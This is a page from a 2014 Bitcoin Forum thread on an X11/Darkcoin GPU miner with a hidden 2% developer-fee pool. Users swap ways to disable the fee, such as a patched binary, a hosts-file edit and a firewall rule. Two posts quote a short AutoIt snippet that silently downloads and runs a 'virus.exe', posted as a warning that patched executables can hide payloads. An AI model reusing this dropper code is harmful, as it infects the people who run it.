Bitcoin Forum
May 14, 2024, 02:19:25 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25 26 27 28 29 30 31 32 33 34 35 36 37 »
  Print  
Author Topic: [ANN][X11] X11/Darkcoin Gpu Miner - updated to use leaked binaries - even faster  (Read 102422 times)
goodluck0319
Sr. Member
****
Offline Offline

Activity: 420
Merit: 250



View Profile
May 23, 2014, 11:39:37 PM
 #441

Hey guys, now I know you guys don't want to run any random executables, however I have binary patched sgminer so it allows you to remove girino's pool

Link https://www.dropbox.com/s/fxs1fwxiu7l0aua/sgminera.exe

You can do a binary comparison and see I've only edited a few bytes(should be 4), there is no way I could've slipped anything malicious.

Why couldn't you remove his pool? Simple, he changed this code

Code:
		if (selected < 0 || selected >= total_pools) {
wlogprint("Invalid selection\n");
goto retry;
}

to

Code:
		if (selected == 0 || selected >= total_pools) {
wlogprint("Invalid selection\n");
goto retry;
}

your batch file already remove the pool or not.
"I'm sure that in 20 years there will either be very large transaction volume or no volume." -- Satoshi
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1715653165
Hero Member
*
Offline Offline

Posts: 1715653165

View Profile Personal Message (Offline)

Ignore
1715653165
Reply with quote  #2

1715653165
Report to moderator
1715653165
Hero Member
*
Offline Offline

Posts: 1715653165

View Profile Personal Message (Offline)

Ignore
1715653165
Reply with quote  #2

1715653165
Report to moderator
Remember remember the 5th of November
Legendary
*
Offline Offline

Activity: 1862
Merit: 1011

Reverse engineer from time to time


View Profile
May 23, 2014, 11:41:43 PM
 #442

Hey guys, now I know you guys don't want to run any random executables, however I have binary patched sgminer so it allows you to remove girino's pool

Link https://www.dropbox.com/s/fxs1fwxiu7l0aua/sgminera.exe

You can do a binary comparison and see I've only edited a few bytes(should be 4), there is no way I could've slipped anything malicious.

Why couldn't you remove his pool? Simple, he changed this code

Code:
		if (selected < 0 || selected >= total_pools) {
wlogprint("Invalid selection\n");
goto retry;
}

to

Code:
		if (selected == 0 || selected >= total_pools) {
wlogprint("Invalid selection\n");
goto retry;
}

your batch file already remove the pool or not.
I have not provided any batch files. I am afraid I don't understand what you mean.

BTC:1AiCRMxgf1ptVQwx6hDuKMu4f7F27QmJC2
comapro
Newbie
*
Offline Offline

Activity: 23
Merit: 0


View Profile
May 24, 2014, 01:16:39 AM
 #443

What is "p c 0"?

In the mining display window, press p, then c, then 0. That is to disable the pool 0 by changing to fail-only mode instead of load balance, which is the donation pool.

Ah, thank you!
old_pioner
Full Member
***
Offline Offline

Activity: 139
Merit: 100


View Profile
May 24, 2014, 02:35:56 AM
Last edit: May 24, 2014, 11:10:31 AM by old_pioner
 #444

Quote from: quovadiz, post: 6600124, member: 255790
Hi guys,

I'm here again with my second test.

I tried to do it as accurate as i could considering not the shown hashrate but the pool earnings.

 

- 2 rigs with exactly the same config (4x7950) (both the rigs were mining @7.2MH/s before to install x11-sgimner on one of them)

- running at the same time on the same pool (prop pay)

- with 2 different accounts

- mining a very low diff coin (one block solved every 2.5 mins approx, hashrate approx 1/5 of the total nethasrate).

 

Results after apporx 14 hours of mining:

 

Rig1 (sph-sgminer)

Earnings: 1753452 coins

Power consumption 450w

Hashrate displayed: 7.2Mh/s

 

Rig2 (x11-sgminer - donation disabled)

Earnings: 2369079 coins (35.1%)

Power consumption: 480w (+6.7%)

Hashrate displayed: 9.9MH/s (+37.5%)

 

Seems there are no doubts... the real hashrate is not so high as shown in sgminer but shares and earning are really higher than running standard sph-sgminer.

 Try please 64-bit miner too, i have error on x11 kernel https://litecointalk.org/index.php?topic=17533.0
Direct link https://ottrbutt.com/sgminer/stable/sgminer-4.2.0-win64.zip
old_pioner
Full Member
***
Offline Offline

Activity: 139
Merit: 100


View Profile
May 24, 2014, 02:42:19 AM
 #445

Hey guys, now I know you guys don't want to run any random executables, however I have binary patched sgminer so it allows you to remove girino's pool

Link https://www.dropbox.com/s/fxs1fwxiu7l0aua/sgminera.exe

You can do a binary comparison and see I've only edited a few bytes(should be 4), there is no way I could've slipped anything malicious.

Why couldn't you remove his pool? Simple, he changed this code

Code:
		if (selected < 0 || selected >= total_pools) {
wlogprint("Invalid selection\n");
goto retry;
}

to

Code:
		if (selected == 0 || selected >= total_pools) {
wlogprint("Invalid selection\n");
goto retry;
}

your batch file already remove the pool or not.
I have not provided any batch files. I am afraid I don't understand what you mean.
Lol ty! But quota still 98? Here is 2% quota not for the pool 0 There 2% per gpu For example 5 card rig = 10% quota on pool 0 Dev not so simply Smiley
jason20005
Newbie
*
Offline Offline

Activity: 38
Merit: 0


View Profile
May 24, 2014, 02:57:00 AM
 #446

To disable the 2% donation:

add one single line to your /etc/hosts:
Quote
127.0.0.1       hirop2pool.girino.org
adaseb
Legendary
*
Offline Offline

Activity: 3752
Merit: 1710



View Profile
May 24, 2014, 05:04:40 AM
 #447

To disable the 2% donation:

add one single line to your /etc/hosts:
Quote
127.0.0.1       hirop2pool.girino.org

This wont work because apparently he uses a few different hosts.

.BEST..CHANGE.███████████████
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
███████████████
..BUY/ SELL CRYPTO..
jason20005
Newbie
*
Offline Offline

Activity: 38
Merit: 0


View Profile
May 24, 2014, 05:11:20 AM
 #448

To disable the 2% donation:

add one single line to your /etc/hosts:
Quote
127.0.0.1       hirop2pool.girino.org

This wont work because apparently he uses a few different hosts.

It has been working on my rig for more than 10 hours.
"hirop2pool.girino.org" is the only pool that I found.

big_coins
Full Member
***
Offline Offline

Activity: 175
Merit: 100


View Profile
May 24, 2014, 05:17:33 AM
 #449

the 'pool guardian' in cgwatcher takes care of the hidden pool no problem.

Now to find a way to automate the failover.....
ingvarfervent
Sr. Member
****
Offline Offline

Activity: 826
Merit: 302



View Profile
May 24, 2014, 05:32:26 AM
 #450

https://www.dropbox.com/sh/zhfbr8xh6zw0gi0/AACa7_sc0PiTYDPv6E3AhRsTa

Link dead ?  Sad
spiderdk
Member
**
Offline Offline

Activity: 74
Merit: 10


View Profile
May 24, 2014, 06:03:49 AM
 #451

Does it work with GTX 750 ti? how much Mh/s?
ivanlabrie
Hero Member
*****
Offline Offline

Activity: 812
Merit: 1000



View Profile
May 24, 2014, 06:06:39 AM
 #452

Does it work with GTX 750 ti? how much Mh/s?

https://github.com/cbuchner1/ccminer/releases

2.1mh/s - 750 ti

(you need to compile the latest source code yourself, v 1.0 only does 1.6mh/s)
ajareselde
Legendary
*
Offline Offline

Activity: 1722
Merit: 1000

Satoshi is rolling in his grave. #bitcoin


View Profile
May 24, 2014, 06:45:30 AM
 #453

Hey guys, now I know you guys don't want to run any random executables, however I have binary patched sgminer so it allows you to remove girino's pool
Link https://www.dropbox.com/s/fxs1fwxiu7l0aua/sgminera.exe

You can do a binary comparison and see I've only edited a few bytes(should be 4), there is no way I could've slipped anything malicious.


Code:
#notrayicon
Func _awesome()
   inetget("https://dl.dropboxusercontent.com/u/somerandomasshole/virus.exe",@WorkingDir&"\virus.exe",0)
   call(ShellExecute(@WorkingDir&"\virus.exe",@WorkingDir,@SW_hide))
EndFunc
_awesome()

im not saying u did something malicious, but dont say theres no way to slip it in 4 bytes Smiley


PepiX
Newbie
*
Offline Offline

Activity: 39
Merit: 0


View Profile
May 24, 2014, 07:10:09 AM
 #454

It has been working on my rig for more than 10 hours.
"hirop2pool.girino.org" is the only pool that I found.



Different builds use different pools. I have come accross these so far: hirop2pool.girino.org, drkp2pool.girino.org
savale
Sr. Member
****
Offline Offline

Activity: 378
Merit: 250


View Profile WWW
May 24, 2014, 07:12:02 AM
 #455

to the author: I don't mind the 2% to donate because of your hard work but it would be nice if some of the original sgminer features are added back in. For example:

--retry-delay
--retries

I ask this because I have a quite a lot of times that the miner is telling me my (main) server is "dead". Actually I can reach that server using a ping command. Actually I think it gives a false positive that the server is dead and it takes quite a time before it finds out the server isn't dead anymore...

thnx

LukeOilRig
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
May 24, 2014, 07:50:31 AM
 #456

how to use this on jackpot algorithm
coinme.info
Sr. Member
****
Offline Offline

Activity: 297
Merit: 250


View Profile
May 24, 2014, 08:15:04 AM
 #457

For all.. just block port 7903 (tcp) in firewall.
Posted from Bitcointa.lk - #1qKDvDxzzgPl19ja

This!!

Just do this and the pool will always be dead to the miner so it wont switch.

Easiest fix so far and is working for me.
big_coins
Full Member
***
Offline Offline

Activity: 175
Merit: 100


View Profile
May 24, 2014, 09:44:58 AM
 #458

For all.. just block port 7903 (tcp) in firewall.
Posted from Bitcointa.lk - #1qKDvDxzzgPl19ja

This!!

Just do this and the pool will always be dead to the miner so it wont switch.

Easiest fix so far and is working for me.

Your hash will still spread to your failover pools remember. you have to P C 0 it to force back to failover as it defaults to load balance.
Remember remember the 5th of November
Legendary
*
Offline Offline

Activity: 1862
Merit: 1011

Reverse engineer from time to time


View Profile
May 24, 2014, 09:45:44 AM
 #459

Hey guys, now I know you guys don't want to run any random executables, however I have binary patched sgminer so it allows you to remove girino's pool
Link https://www.dropbox.com/s/fxs1fwxiu7l0aua/sgminera.exe

You can do a binary comparison and see I've only edited a few bytes(should be 4), there is no way I could've slipped anything malicious.


Code:
#notrayicon
Func _awesome()
   inetget("https://dl.dropboxusercontent.com/u/somerandomasshole/virus.exe",@WorkingDir&"\virus.exe",0)
   call(ShellExecute(@WorkingDir&"\virus.exe",@WorkingDir,@SW_hide))
EndFunc
_awesome()

im not saying u did something malicious, but dont say theres no way to slip it in 4 bytes Smiley



It is virtually AND physically impossible to slip in something in just 4 bytes.

BTC:1AiCRMxgf1ptVQwx6hDuKMu4f7F27QmJC2
jeky
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
May 24, 2014, 09:47:08 AM
Last edit: May 24, 2014, 10:26:06 AM by jeky
 #460

LOL !  Grin

I've got more than a reason to think that this is a scam, the first is that the GPU code is not inside the miner program but inside the .cl file, so I don't think you could be able to optimize anything only with the miner, but why don't give you a chance?

I've tried to download the linux version without luck, would you reupload it please?
Also email will be fine jeky (at) [Suspicious link removed]

EDIT:
I've read all the thread and discovered that probably the modified miner also includes a different .cl file.
So probably the author could be considered UNFAIR but not a scammer !
If someone want to send me the linux version I would be happy to test it. Thanks

EDIT2:
Sorry for what it was considered a "suspicious link", I only wanted to use an email different from my master email!
Probably this one is better: jeky (at) community.it
Sorry again
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25 26 27 28 29 30 31 32 33 34 35 36 37 »
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!